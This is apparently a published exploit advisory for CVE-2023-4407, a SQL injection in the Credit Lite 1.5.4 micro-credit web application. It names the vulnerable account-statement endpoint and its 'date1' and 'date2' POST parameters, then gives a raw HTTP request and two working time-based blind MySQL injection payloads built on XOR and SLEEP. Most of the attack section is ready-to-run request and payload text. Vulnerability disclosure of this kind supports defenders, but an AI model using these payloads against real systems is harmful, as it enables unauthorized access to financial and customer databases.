Share
## https://sploitus.com/exploit?id=PACKETSTORM:174244
# Exploit Title: Credit Lite 1.5.4 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 31/07/2023  
# Vendor: Hobby-Tech  
# Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392  
# Software Link: https://credit-lite.appshat.xyz/  
# Tested on: Windows 10 Pro  
# Impact: Database Access  
# CVE: CVE-2023-4407  
# CWE: CWE-89 - CWE-74 - CWE-707  
  
  
## Description  
  
SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.  
  
  
  
## Steps to Reproduce:  
  
To Catch the POST Request  
  
1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement  
  
2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter]  
  
  
  
Path: /portal/reports/account_statement  
  
POST parameter 'date1' is vulnerable to SQL Injection  
POST parameter 'date2' is vulnerable to SQL Injection  
  
-------------------------------------------------------------------------  
POST /portal/reports/account_statement HTTP/2  
  
_token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001  
-------------------------------------------------------------------------  
  
---  
Parameter: date1 (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001  
  
Parameter: date2 (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001  
---  
  
  
  
[-] Done